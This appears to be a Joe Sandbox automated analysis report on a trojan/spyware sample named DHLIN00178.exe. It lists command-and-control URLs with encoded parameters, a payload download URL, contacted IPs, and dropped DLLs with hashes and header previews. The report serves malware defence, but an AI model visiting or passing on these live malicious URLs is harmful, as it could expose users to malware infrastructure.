                                    www.popcors.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sandyhillsagritourism.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.0w3jy.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.37123.vip
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.daon3999.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.5319ss.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.adasoft.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.0w3jy.com/i9th/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hhkk143.cfd/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.cmproutdoors.com/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.popcors.com/i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.popcors.com/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.37123.vip/i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.sem-jobs.com/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.0w3jy.com/i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hot6s.com/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.riverflow.net/i9th/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.casinoenligne-france.info/i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.adasoft.info/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.sandyhillsagritourism.com/i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.spotcheck.site/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.riverflow.net/i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.5319ss.com/i9th/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.37123.vip/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.daon3999.net/i9th/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.verde-amar.info/i9th/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.daon3999.net/i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w==true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hhkk143.cfd/i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.adasoft.info/i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.binfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dinggubd.net/i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw==true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.dinggubd.net/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.verde-amar.info/i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.5319ss.com/i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sem-jobs.com/i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.casinoenligne-france.info/i9th/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.spotcheck.site/i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.cmproutdoors.com/i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByYtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://machupichuturismo.com/bBbWIWXVMfEPUqiMugc81.bincjDHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://ocsp.thawte.com0DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://nsis.sf.net/NSIS_ErrorErrorDHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDDHLIN00178.exe, 00000005.00000001.5907937864.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                      		high
                                                      http://www.gopher.ftp://ftp.DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.symauth.com/cps0(DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/dotnet/runtimeDHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdDHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://nsis.sf.net/NSIS_ErrorDHLIN00178.exe, DHLIN00178.exe, 00000001.00000000.4561346773.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000001.00000002.6089742553.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHLIN00178.exe, 00000005.00000000.5906874308.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            https://aka.ms/dotnet-warnings/DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.thawte.com/ThawteTimestampingCA.crl0DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.symauth.com/rpa00DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.nero.comDHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdDHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://mozilla.org0DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.8.203
                                                                    		www.hot6s.comUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    156.255.170.114
                                                                    		www.cmproutdoors.comSeychelles
                                                                    		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                    222.122.213.231
                                                                    		daon3999.netKorea Republic of
                                                                    		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                    34.117.168.233
                                                                    		td-ccm-168-233.wixdns.netUnited States
                                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                    64.190.63.111
                                                                    		www.riverflow.netUnited States
                                                                    		11696NBS11696UStrue
                                                                    3.9.182.46
                                                                    		www.casinoenligne-france.infoUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    199.192.30.193
                                                                    		www.spotcheck.siteUnited States
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    38.163.2.19
                                                                    		www.dinggubd.netUnited States
                                                                    		174COGENT-174UStrue
                                                                    185.53.177.54
                                                                    		www.verde-amar.infoGermany
                                                                    		61969TEAMINTERNET-ASDEtrue
                                                                    188.114.96.3
                                                                    		www.hhkk143.cfdEuropean Union
                                                                    		13335CLOUDFLARENETUStrue
                                                                    154.210.212.94
                                                                    		gy.adsfzcvx.comSeychelles
                                                                    		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                    103.20.61.209
                                                                    		u4tgw7dr.n.funnull35.comHong Kong
                                                                    		133380LAYER-ASLayerstackLimitedHKtrue
                                                                    85.13.156.177
                                                                    		www.sem-jobs.comGermany
                                                                    		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEtrue
                                                                    164.88.122.250
                                                                    		hk.ygrcw.cnSouth Africa
                                                                    		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                                    162.213.255.18
                                                                    		machupichuturismo.comUnited States
                                                                    		22612NAMECHEAP-NETUSfalse
                                                                    81.88.48.71
                                                                    		adasoft.infoItaly
                                                                    		39729REGISTER-ASITtrue
                                                                    173.230.227.171
                                                                    		popcors.comUnited States
                                                                    		12180INTERNAP-2BLKUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                    Analysis ID:829130
                                                                    Start date and time:2023-03-17 21:33:08 +01:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 17m 3s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                    Number of analysed new started processes analysed:14
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample file name:DHLIN00178.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/11@19/17
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HDC Information:
                                                                    • Successful, ratio: 6.4% (good quality ratio 6.1%)
                                                                    • Quality average: 78.4%
                                                                    • Quality standard deviation: 27.4%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                                                    • HTTP Packets have been reduced
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.136, 20.190.160.22, 40.126.32.68, 20.190.160.20, 40.126.32.138, 40.126.32.76, 40.126.32.140
                                                                    • Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, www.tm.v6.a.prd.aadg.akadns.net, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                    • Execution Graph export aborted for target DHLIN00178.exe, PID 1776 because there are no executed function
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\Dystonia.Fis116

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:ASCII text, with very long lines (53810), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):53810
                                                                    Entropy (8bit):2.6910915446582364
                                                                    Encrypted:false
                                                                    SSDEEP:768:m5Bw4mEWCEEEEE87pG5nZpb+fPM3kgjx/6yE2xNLXnF+yB54yLvBkhBYq7oP8n5j:mlUnZpxU6xRLM2Lclp5weok
                                                                    MD5:7FB8B546EC10F0822FC0B4089E560733
                                                                    SHA1:2CEFF57E58D87662C329D3F1978CCBC6FCEB16DF
                                                                    SHA-256:6D868BCFDE2ECCB7EBD58E727C3DC32434DA3F21E0EF80AEA2C89E5F5A7F3642
                                                                    SHA-512:3F25762F1393CB4C9538B6005F00B8E122C029F05E542229D17EE6D761F0A91954C2CA79426650A8F1DE0310CB850E8E27AC2A713764BEB2719EBDE17A4CC59B
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:00000F005B001A1A00004C00000054000000E300E9E90033000000DDDDDD00000000005C5C000000006700003A000054005D00000036363600004F4F00006D6D0000FFFFFFFFFF009E000086868600F30000A6A6A6A6000001000000141414140018000000262600303000B800000000008300202000660048008600000000F2F2F200000C00000000CF000000060600000030300078008700001C00BA00000000000000F3F300CB00C6C6C6C60050000000F000E3E300D1D1D100D9009A9A0000240000EDED00010000000000007070700000004B4B00000026003700A600363636000000420000A1000000C200BDBDBD005C5C002C000000F7000000000000007E7E7E7E7E00001E1E00ED00004C004C0000AB00002C2C007F7F0000007C00000E0000B40000BFBFBFBF000000AE000000000000888800FCFCFCFC005151000000C6C6C6007777770000CBCBCBCBCBCBCBCBCB0000DCDC00000000000097970000646400121200AE000000DA001C003F3F00000000CCCC0000333333008080808080800000000032009B9B0023232300004A000000A0A0A000000F0F00FF00008B00E7E7004400E5E50000E3E3E3E3E300202000000020007900001F1F0000007300000D00A100FAFA0003000072000000005A5A00E2E200B7B7B7B700000000002300A6A600720000002B005D000000838383

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\Skrddersjlenes.Nou

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):260228
                                                                    Entropy (8bit):7.296059267389181
                                                                    Encrypted:false
                                                                    SSDEEP:3072:Frjq0MSUGUC72zwV6xCFAGSsIb0N1YK+S6RSojl8XfHtc9LtR866+Tq8oD7xYCBs:F0ZGUCT/Ib0NKSogfNc3HnW8oDHtswe
                                                                    MD5:3AE902DED608BA446C2B6FF0804D96BE
                                                                    SHA1:D3B6BF0FFA9F017DACA457F4569A04AA086CD263
                                                                    SHA-256:377721BE18CEB08A0D3181A3C375C08F5B918FE7CB0509046AB911C9030CDB95
                                                                    SHA-512:FECA207CF6E38A4DC94A266F02D84E86BDE14C6EC5F6859EADC38369955103BD707B97D09DEBEAD7CB5600D99E0A9043AF234FDBA221B674041844E926934FE8
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):75248
                                                                    Entropy (8bit):6.149004775364808
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                                                    MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                                                    SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                                                    SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                                                    SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):485488
                                                                    Entropy (8bit):6.710350474742332
                                                                    Encrypted:false
                                                                    SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                                                    MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                                                    SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                                                    SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                                                    SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):102577
                                                                    Entropy (8bit):5.075179901575448
                                                                    Encrypted:false
                                                                    SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                                                    MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                                                    SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                                                    SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                                                    SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49768
                                                                    Entropy (8bit):5.650496280667822
                                                                    Encrypted:false
                                                                    SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                                                    MD5:BCC32F5B608C99F89508921B6333B329
                                                                    SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                                                    SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                                                    SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):36029
                                                                    Entropy (8bit):5.699900454607003
                                                                    Encrypted:false
                                                                    SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                                                    MD5:8A54723090530190EB11AFCD5B702B1B
                                                                    SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                                                    SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                                                    SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):130344
                                                                    Entropy (8bit):6.2622011397185
                                                                    Encrypted:false
                                                                    SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                                                    MD5:2455841538BA8A502398C18781CC3CEB
                                                                    SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                                                    SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
